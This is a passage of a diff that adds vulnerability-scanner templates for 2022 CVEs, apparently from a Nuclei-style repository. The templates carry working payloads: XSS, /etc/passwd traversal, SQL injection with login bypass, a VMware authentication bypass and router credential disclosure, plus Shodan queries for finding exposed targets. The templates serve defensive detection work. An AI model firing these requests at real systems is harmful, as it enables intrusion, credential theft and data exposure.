+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "ID="
+          - "Password="
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - text/plain
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        regex:
+          - Password='(.+?)'
diff --git a/cves/2022/CVE-2022-31373.yaml b/cves/2022/CVE-2022-31373.yaml
new file mode 100644
index 0000000000..b2ad77837e
--- /dev/null
+++ b/cves/2022/CVE-2022-31373.yaml
@@ -0,0 +1,41 @@
+id: CVE-2022-31373
+
+info:
+  name: SolarView Compact 6.00 - Cross-Site Scripting
+  author: ritikchaddha
+  severity: medium
+  description: |
+    SolarView Compact v6.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the component Solar_AiConf.php.
+  reference:
+    - https://github.com/badboycxcc/SolarView_Compact_6.0_xss
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-31373
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2022-31373
+    cwe-id: CWE-79
+  metadata:
+    shodan-query: http.html:"SolarView Compact"
+    verified: "true"
+  tags: cve,cve2022,xss,solarview
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/Solar_AiConf.php/%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '/Solar_AiConf.php/"><script>alert(document.domain)</script>'
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2022/CVE-2022-31474.yaml b/cves/2022/CVE-2022-31474.yaml
new file mode 100644
index 0000000000..d86bf19216
--- /dev/null
+++ b/cves/2022/CVE-2022-31474.yaml
@@ -0,0 +1,30 @@
+id: CVE-2022-31474
+
+info:
+  name: BackupBuddy Arbitrary File Read
+  author: aringo
+  severity: high
+  description: BackupBuddy versions 8.5.8.0 through 8.7.4.1 are vulnerable to arbitrary file read
+  reference:
+    - https://www.wordfence.com/blog/2022/09/psa-nearly-5-million-attacks-blocked-targeting-0-day-in-backupbuddy-plugin/
+    - https://ithemes.com/blog/wordpress-vulnerability-report-special-edition-september-6-2022-backupbuddy
+    - https://ithemes.com/backupbuddy/
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31474
+  remediation: Developers should immediately upgrade to at least version 8.7.5 or higher
+  tags: cve,cve2022,wordpress,wp-plugin,wp,lfi,backupbuddy
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-admin/admin-post.php?page=pb_backupbuddy_destinations&local-destination-id=/etc/passwd&local-download=/etc/passwd"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:.*:0:0:"
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2022/CVE-2022-31656.yaml b/cves/2022/CVE-2022-31656.yaml
new file mode 100644
index 0000000000..aa0c7698f2
--- /dev/null
+++ b/cves/2022/CVE-2022-31656.yaml
@@ -0,0 +1,45 @@
+id: CVE-2022-31656
+
+info:
+  name: VMware - Authentication Bypass
+  author: DhiyaneshDk
+  severity: critical
+  description: |
+    VMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate.
+  reference:
+    - https://petrusviet.medium.com/dancing-on-the-architecture-of-vmware-workspace-one-access-eng-ad592ae1b6dd
+    - https://www.vmware.com/security/advisories/VMSA-2022-0021.html
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31656
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-31656
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2022-31656
+    cwe-id: CWE-287
+  metadata:
+    shodan-query: http.favicon.hash:-1250474341
+    verified: "true"
+  tags: cve,cve2022,vmware,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/SAAS/t/_/;/WEB-INF/web.xml"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<web-app"
+          - "<servlet-name>"
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "application/xml"
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2022/CVE-2022-31793.yaml b/cves/2022/CVE-2022-31793.yaml
new file mode 100644
index 0000000000..341352b3d0
--- /dev/null
+++ b/cves/2022/CVE-2022-31793.yaml
@@ -0,0 +1,38 @@
+id: CVE-2022-31793
+
+info:
+  name: muhttpd <= 1.1.5 - Path traversal
+  author: scent2d
+  severity: high
+  description: |
+    A Path traversal vulnerability exists in versions muhttpd 1.1.5 and earlier. The vulnerability is directly requestable to files within the file system.
+  reference:
+    - https://derekabdine.com/blog/2022-arris-advisory.html
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31793
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-31793
+    - https://derekabdine.com/blog/2022-arris-advisory
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2022-31793
+    cwe-id: CWE-22
+  metadata:
+    verified: "true"
+  tags: cve,cve2022,network,muhttpd,lfi,unauth
+
+network:
+  - host:
+      - "{{Hostname}}"
+
+    inputs:
+      - data: "47455420612F6574632F706173737764"
+        type: hex
+      - data: "\n\n"
+
+    read-size: 128
+    matchers:
+      - type: word
+        part: body
+        encoding: hex
+        words:
+          - "726f6f743a"
diff --git a/cves/2022/CVE-2022-31798.yaml b/cves/2022/CVE-2022-31798.yaml
new file mode 100644
index 0000000000..1556c42fa3
--- /dev/null
+++ b/cves/2022/CVE-2022-31798.yaml
@@ -0,0 +1,42 @@
+id: CVE-2022-31798
+
+info:
+  name: Nortek Linear eMerge E3-Series - Cross-Site Scripting
+  author: ritikchaddha
+  severity: medium
+  description: |
+    There is local session fixation that chained with reflected cross-site scripting leads to account take over of admin or less privileged users.
+  reference:
+    - https://packetstormsecurity.com/files/167992/
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31798
+    - http://packetstormsecurity.com/files/167992/Nortek-Linear-eMerge-E3-Series-Account-Takeover.html
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2022-31798
+    cwe-id: CWE-79
+  metadata:
+    shodan-query: http.title:"eMerge"
+    verified: "true"
+  tags: cve2022,emerge,nortek,xss,packetstorm,cve
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/card_scan.php?No=0000&ReaderNo=0000&CardFormatNo=%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - ',"CardFormatNo":"<img src=x onerror=alert(document.domain)>"}'
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2022/CVE-2022-31845.yaml b/cves/2022/CVE-2022-31845.yaml
new file mode 100644
index 0000000000..6977d32158
--- /dev/null
+++ b/cves/2022/CVE-2022-31845.yaml
@@ -0,0 +1,41 @@
+id: CVE-2022-31845
+
+info:
+  name: WAVLINK WN535 G3 - Information Disclosure
+  author: arafatansari
+  severity: high
+  description: |
+    A vulnerability in live_check.shtml of WAVLINK WN535 G3 M35G3R.V5030.180927 allows attackers to obtain sensitive router information via execution of the exec cmd function.
+  reference:
+    - https://github.com/pghuanghui/CVE_Request/blob/main/WAVLINK%20WN535%20G3__check_live.md
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-31845
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30489
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2022-31845
+    cwe-id: CWE-668
+  metadata:
+    shodan-query: http.html:"Wavlink"
+    verified: "true"
+  tags: cve,cve2022,wavlink,exposure
+
+requests:
+  - raw:
+      - |
+        @timeout: 10s
+        GET /live_check.shtml HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - 'Model='
+          - 'FW_Version='
+          - 'LanIP='
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2022/CVE-2022-31846.yaml b/cves/2022/CVE-2022-31846.yaml
new file mode 100644
index 0000000000..1d63b340b6
--- /dev/null
+++ b/cves/2022/CVE-2022-31846.yaml
@@ -0,0 +1,39 @@
+id: CVE-2022-31846
+
+info:
+  name: WAVLINK WN535 G3 - Information Disclosure
+  author: arafatansari
+  severity: high
+  description: |
+    A vulnerability is in the 'live_mfg.shtml' page of the WAVLINK WN535 G3,Firmware package version M35G3R.V5030.180927
+  reference:
+    - https://github.com/pghuanghui/CVE_Request/blob/main/WAVLINK%20WN535%20G3__live_mfg.md
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-31846
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30489
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2022-31846
+    cwe-id: CWE-668
+  metadata:
+    shodan-query: http.html:"Wavlink"
+    verified: "true"
+  tags: cve,cve2022,wavlink,exposure
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/live_mfg.shtml"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - 'Model='
+          - 'DefaultIP='
+          - 'LOGO1='
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2022/CVE-2022-31847.yaml b/cves/2022/CVE-2022-31847.yaml
new file mode 100644
index 0000000000..c7fc03b564
--- /dev/null
+++ b/cves/2022/CVE-2022-31847.yaml
@@ -0,0 +1,39 @@
+id: CVE-2022-31847
+
+info:
+  name: WAVLINK WN579 X3 M79X3.V5030.180719 - Information Disclosure
+  author: arafatansari
+  severity: high
+  description: |
+    A vulnerability in /cgi-bin/ExportAllSettings.sh of WAVLINK WN579 X3 M79X3.V5030.180719 allows attackers to obtain sensitive router information via a crafted POST request.
+  reference:
+    - https://github.com/pghuanghui/CVE_Request/blob/main/WAVLINK%20WN579%20X3__Sensitive%20information%20leakage.md
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-31847
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2022-31847
+    cwe-id: CWE-668
+  metadata:
+    shodan-query: http.html:"Wavlink"
+    verified: "true"
+  tags: cve,cve2022,wavlink,exposure
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/cgi-bin/ExportAllSettings.sh"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - 'Login='
+          - 'Password='
+          - 'Model='
+          - 'AuthMode='
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2022/CVE-2022-32007.yaml b/cves/2022/CVE-2022-32007.yaml
new file mode 100644
index 0000000000..4f303c8747
--- /dev/null
+++ b/cves/2022/CVE-2022-32007.yaml
@@ -0,0 +1,42 @@
+id: CVE-2022-32007
+
+info:
+  name: Complete Online Job Search System v1.0 - SQL Injection
+  author: arafatansari
+  severity: high
+  description: |
+    Complete Online Job Search System v1.0 is vulnerable to SQL Injection via /eris/admin/company/index.php?view=edit&id=.
+  reference:
+    - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/online-job-search-system/SQLi-2.md
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-32007
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 7.2
+    cve-id: CVE-2022-32007
+    cwe-id: CWE-89
+  metadata:
+    verified: "true"
+  tags: cve,cve2022,sqli,eris,authenticated
+
+variables:
+  num: "999999999"
+
+requests:
+  - raw:
+      - |
+        POST /admin/login.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        user_email={{username}}&user_pass={{password}}&btnLogin=
+
+      - |
+        GET /admin/company/index.php?view=edit&id=-3%27%20union%20select%201,md5({{num}}),3,4,5,6--+ HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '{{md5({{num}})}}'
diff --git a/cves/2022/CVE-2022-32015.yaml b/cves/2022/CVE-2022-32015.yaml
new file mode 100644
index 0000000000..197a457564
--- /dev/null
+++ b/cves/2022/CVE-2022-32015.yaml
@@ -0,0 +1,33 @@
+id: CVE-2022-32015
+
+info:
+  name: Complete Online Job Search System v1.0 - SQL Injection
+  author: arafatansari
+  severity: high
+  description: |
+    Complete Online Job Search System v1.0 is vulnerable to SQL Injection via /eris/index.php?q=category&search=.
+  reference:
+    - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/online-job-search-system/SQLi-8.md
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-32015
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 7.2
+    cve-id: CVE-2022-32015
+    cwe-id: CWE-89
+  metadata:
+    verified: "true"
+  tags: cve,cve2022,sqli,jobsearch
+
+variables:
+  num: "999999999"
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.php?q=category&search=Banking%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,md5({{num}}),15,16,17,18,19--+"
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '{{md5({{num}})}}'
diff --git a/cves/2022/CVE-2022-32018.yaml b/cves/2022/CVE-2022-32018.yaml
new file mode 100644
index 0000000000..b06732f3e4
--- /dev/null
+++ b/cves/2022/CVE-2022-32018.yaml
@@ -0,0 +1,33 @@
+id: CVE-2022-32018
+
+info:
+  name: Complete Online Job Search System v1.0 - SQL Injection
+  author: arafatansari
+  severity: high
+  description: |
+    Complete Online Job Search System v1.0 is vulnerable to SQL Injection via /eris/index.php?q=hiring&search=.
+  reference:
+    - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/online-job-search-system/SQLi-12.md
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-32018
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 7.2
+    cve-id: CVE-2022-32018
+    cwe-id: CWE-89
+  metadata:
+    verified: "true"
+  tags: cve,cve2022,sqli
+
+variables:
+  num: "999999999"
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.php?q=hiring&search=URC%27%20union%20select%201,2,3,4,5,6,7,8,9,md5({{num}}),11,12,13,14,15,16,17,18,19--+"
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '{{md5({{num}})}}'
diff --git a/cves/2022/CVE-2022-32022.yaml b/cves/2022/CVE-2022-32022.yaml
new file mode 100644
index 0000000000..cbc60fc8d8
--- /dev/null
+++ b/cves/2022/CVE-2022-32022.yaml
@@ -0,0 +1,49 @@
+id: CVE-2022-32022
+
+info:
+  name: Car Rental Management System v1.0 - SQL Injection
+  author: arafatansari
+  severity: high
+  description: |
+    Car Rental Management System v1.0 is vulnerable to SQL Injection via /admin/ajax.php?action=login.
+  reference:
+    - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-1.md
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-32022
+    - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-1.md.
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 7.2
+    cve-id: CVE-2022-32022
+    cwe-id: CWE-89
+  metadata:
+    shodan-query: http.html:"Car Rental Management System"
+    verified: "true"
+  tags: cve,cve2022,carrental,cms,sqli,login-bypass
+
+requests:
+  - raw:
+      - |
+        POST /admin/ajax.php?action=login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        username=admin'+or+'1'%3D'1'%23&password=admin
+
+      - |
+        GET /admin/index.php?page=home HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'Welcome back Administrator!'
+          - 'action=logout'
+          - 'Manage Account'
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2022/CVE-2022-32024.yaml b/cves/2022/CVE-2022-32024.yaml
new file mode 100644
index 0000000000..7aea1ed902
--- /dev/null
+++ b/cves/2022/CVE-2022-32024.yaml
@@ -0,0 +1,50 @@
+id: CVE-2022-32024
+
+info:
+  name: Car Rental Management System v1.0 - SQL Injection
+  author: arafatansari
+  severity: high
+  description: |
+    Car Rental Management System v1.0 is vulnerable to SQL Injection via /booking.php?car_id=.
+  reference:
+    - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-4.md
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-32024
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 7.2
+    cve-id: CVE-2022-32024
+    cwe-id: CWE-89
+  metadata:
+    comment: Login bypass is also possible using the payload-  admin'+or+'1'%3D'1' in username.
+    shodan-query: http.html:"Car Rental Management System"
+    verified: "true"
+  tags: cve,cve2022,carrental,cms,sqli,authenticated
+
+variables:
+  num: "999999999"
+
+requests:
+  - raw:
+      - |
+        POST /admin/ajax.php?action=login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        username={{username}}&password={{password}}
+
+      - |
+        GET /booking.php?car_id=-1%20union%20select%201,md5({{num}}),3,4,5,6,7,8,9,10--+ HTTP/1.1
+        Host: {{Hostname}}
+
+    skip-variables-check: true
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '{{md5({{num}})}}'
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2022/CVE-2022-32025.yaml b/cves/2022/CVE-2022-32025.yaml
new file mode 100644
index 0000000000..e99d7f0fe5
--- /dev/null
+++ b/cves/2022/CVE-2022-32025.yaml
@@ -0,0 +1,52 @@
+id: CVE-2022-32025
+
+info:
+  name: Car Rental Management System v1.0 - SQL Injection
+  author: arafatansari
+  severity: high
+  description: |
+    Car Rental Management System v1.0 is vulnerable to SQL Injection via /admin/view_car.php?id=.
+  reference:
+    - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-6.md
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-32025
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 7.2
+    cve-id: CVE-2022-32025
+    cwe-id: CWE-89
+  metadata:
+    comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username.
+    shodan-query: http.html:"Car Rental Management System"
+    verified: "true"
+  tags: cve,cve2022,carrental,cms,sqli,authenticated
+
+variables:
+  num: "999999999"
+
+requests:
+  - raw:
+      - |
+        POST /admin/ajax.php?action=login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        username={{username}}%23&password={{password}}
+
+      - |
+        GET /admin/view_car.php?id=-1%20union%20select%201,md5({{num}}),3,4,5,6,7,8,9,10--+ HTTP/1.1
+        Host: {{Hostname}}
+
+    skip-variables-check: true
+    redirects: true
+    max-redirects: 2
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '{{md5({{num}})}}'
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2022/CVE-2022-32026.yaml b/cves/2022/CVE-2022-32026.yaml
new file mode 100644
index 0000000000..53937fa44c
--- /dev/null
+++ b/cves/2022/CVE-2022-32026.yaml
@@ -0,0 +1,52 @@
+id: CVE-2022-32026
+
+info:
+  name: Car Rental Management System v1.0 - SQL Injection
+  author: arafatansari
+  severity: high
+  description: |
+    Car Rental Management System v1.0 is vulnerable to SQL Injection via /admin/manage_booking.php?id=.
+  reference:
+    - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-8.md
+    - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-5.md
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-32028
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 7.2
+    cve-id: CVE-2022-32028
+    cwe-id: CWE-89
+  metadata:
+    verified: true
+    shodan-query: http.html:"Car Rental Management System"
+    comment: Login bypass is also possible using the payload-  admin'+or+'1'%3D'1' in username.
+  tags: cve,cve2022,carrental,cms,sqli,authenticated
+
+variables:
+  num: "999999999"
+
+requests:
+  - raw:
+      - |
+        POST /admin/ajax.php?action=login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        username={{username}}&password={{password}}
+      - |
+        GET /admin/manage_booking.php?id=-1%20union%20select%201,2,3,4,5,6,md5({{num}}),8,9,10,11--+ HTTP/1.1
+        Host: {{Hostname}}
+
+    skip-variables-check: true
+    redirects: true
+    max-redirects: 2
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '{{md5({{num}})}}'
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2022/CVE-2022-32028.yaml b/cves/2022/CVE-2022-32028.yaml
new file mode 100644
index 0000000000..7447956c3b
--- /dev/null
+++ b/cves/2022/CVE-2022-32028.yaml
@@ -0,0 +1,52 @@
+id: CVE-2022-32028
+
+info:
+  name: Car Rental Management System v1.0 - SQL Injection
+  author: arafatansari
+  severity: high
+  description: |
+    Car Rental Management System v1.0 is vulnerable to SQL Injection via /admin/manage_user.php?id=.
+  reference:
+    - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-8.md
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-32028
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 7.2
+    cve-id: CVE-2022-32028
+    cwe-id: CWE-89
+  metadata:
+    comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username.
+    shodan-query: http.html:"Car Rental Management System"
+    verified: "true"
+  tags: cve,cve2022,carrental,cms,sqli,authenticated
+
+variables:
+  num: "999999999"
+
+requests:
+  - raw:
+      - |
+        POST /admin/ajax.php?action=login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        username={{username}}&password={{password}}
+
+      - |
+        GET /admin/manage_user.php?id=-1%20union%20select%201,md5({{num}}),3,4,5--+ HTTP/1.1
+        Host: {{Hostname}}
+
+    skip-variables-check: true
+    redirects: true
+    max-redirects: 2
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '{{md5({{num}})}}'
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2022/CVE-2022-32195.yaml b/cves/2022/CVE-2022-32195.yaml
new file mode 100644
index 0000000000..ad8a8817c4
--- /dev/null
+++ b/cves/2022/CVE-2022-32195.yaml
@@ -0,0 +1,43 @@
+id: CVE-2022-32195
+
+info:
+  name: Open edX - Cross-Site Scripting
+  author: arafatansari
+  severity: medium
+  description: |
+    Open edX platform before 2022-06-06 allows Reflected Cross-site Scripting via the "next" parameter in the logout URL.
+  reference:
+    - https://discuss.openedx.org/t/security-patch-for-logout-page-xss-vulnerability/7408
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-32195
+    - https://github.com/edx
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2022-32195
+    cwe-id: CWE-79
+  metadata:
+    comment: Hover the cursor on the redirect link
+    shodan-query: http.html:"Open edX"
+    verified: "true"
+  tags: cve,cve2022,openedx,xss
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/logout?next=%208%22onmouseover=%22alert(document.domain)'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<a href="+8"onmouseover="alert(document.domain)">click here to go to'
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2022/CVE-2022-32409.yaml b/cves/2022/CVE-2022-32409.yaml
new file mode 100644
index 0000000000..45a9d0ff2e
--- /dev/null
+++ b/cves/2022/CVE-2022-32409.yaml
@@ -0,0 +1,38 @@
+id: CVE-2022-32409
+
+info:
+  name: Portal do Software Publico Brasileiro i3geo 7.0.5 - Local File Inclusion
+  author: pikpikcu
+  severity: critical
+  description: Portal do Software Publico Brasileiro i3geo 7.0.5 is vulnerable to local file inclusion in the component codemirror.php, which allows attackers to execute arbitrary PHP code via a crafted HTTP request.
+  reference:
+    - https://github.com/wagnerdracha/ProofOfConcept/blob/main/i3geo_proof_of_concept.txt
+    - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-32409
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2022-32409
+    cwe-id: CWE-94
+  metadata:
+    shodan-query: http.html:"i3geo"
+    verified: "true"
+  tags: cve,cve2022,i3geo,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/i3geo/exemplos/codemirror.php?&pagina=../../../../../../../../../../../../../../../../../etc/passwd"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/07/22
diff --git a/cves/2022/CVE-2022-32444.yaml b/cves/2022/CVE-2022-32444.yaml
new file mode 100644
index 0000000000..1460ae469c
--- /dev/null
+++ b/cves/2022/CVE-2022-32444.yaml
@@ -0,0 +1,30 @@
+id: CVE-2022-32444
+
+info:
+  name: u5cms v8.3.5 - Open Redirect
+  author: 0x_Akoko
+  severity: medium
+  description: |
+    u5cms version 8.3.5 contains a URL redirection vulnerability that can cause a user's browser to be redirected to another site via /loginsave.php.
+  reference:
+    - https://github.com/u5cms/u5cms/issues/50
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-32444
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2022-32444
+    cwe-id: CWE-601
+  tags: cve,cve2022,redirect,u5cms,cms
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/loginsave.php?u=http://interact.sh'
+
+    matchers:
+      - type: regex
+        part: header
+        regex:
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
+
+# Enhanced by cs 05/30/2022
diff --git a/cves/2022/CVE-2022-32770.yaml b/cves/2022/CVE-2022-32770.yaml
new file mode 100644
index 0000000000..bee623eabc
--- /dev/null
+++ b/cves/2022/CVE-2022-32770.yaml
@@ -0,0 +1,42 @@
+id: CVE-2022-32770
+
+info:
+  name: WWBN AVideo 11.6 - Cross-Site Scripting
+  author: arafatansari
+  severity: medium
+  description: |
+    A cross-site scripting (xss) vulnerability exists in the footer alerts functionality of WWBN AVideo 11.6 via "toast" parameter which is inserted into the document with insufficient sanitization.
+  reference:
+    - https://talosintelligence.com/vulnerability_reports/TALOS-2022-1538
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-32770
+    - https://github.com/WWBN/AVideo/blob/e04b1cd7062e16564157a82bae389eedd39fa088/updatedb/updateDb.v12.0.sql
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2022-32770
+    cwe-id: CWE-79
+  metadata:
+    shodan-query: http.html:"AVideo"
+    verified: "true"
+  tags: cve,cve2022,avideo,xss,wwbn
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.php?toast=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'text: "</script><script>alert(document.cookie);</script>'
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2022/CVE-2022-32771.yaml b/cves/2022/CVE-2022-32771.yaml
new file mode 100644
index 0000000000..fb67c95f3c
--- /dev/null
+++ b/cves/2022/CVE-2022-32771.yaml
@@ -0,0 +1,44 @@
+id: CVE-2022-32771
+
+info:
+  name: WWBN AVideo 11.6 - Cross-Site Scripting
